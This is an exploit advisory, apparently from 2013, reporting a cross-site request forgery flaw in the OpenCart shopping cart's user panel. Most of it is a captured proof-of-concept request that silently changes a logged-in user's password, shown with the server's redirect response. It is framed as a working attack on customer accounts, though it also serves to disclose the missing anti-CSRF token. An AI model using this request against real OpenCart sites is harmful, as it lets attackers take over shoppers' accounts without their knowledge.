# Exploit Title : OpenCart CSRF # Date : 2013/4/2 # Exploit Author : Saadat Ullah ， saadi_linux@rocketmail.com # Software Link : http://www.opencart.com/index.php?route=download/download : https://github.com/opencart # Software web : www.opencart.com # Author HomePage : http://security-geeks.blogspot.com/ # Tested on: Server : Apache/2.2.15 PHP/5.3.3 # Cross-site request forgery OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url. OpenCart is not using any security token to prevent it against CSRF. It is vulnerable to all location inside User panel. Header ---------------------------------------------------------- http://localhost/index.php?route=account/password POST /index.php?route=account/password HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=e634322aa558022cdd8664b8d32124b7; language=en; currency=USD Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------2465524120551 Content-Length: 257 -----------------------------2465524120551 Content-Disposition: form-data; name="password" 123456789 -----------------------------2465524120551 Content-Disposition: form-data; name="confirm" 123456789 -----------------------------2465524120551-- Response HTTP/1.1 302 Found Date: Tue, 02 Apr 2013 14:49:53 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 302 Location: http://localhost/index.php?route=account/account Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html ---------------------------------------------------------- Simple Poc to change user Password #Independent Pakistani Security Researcher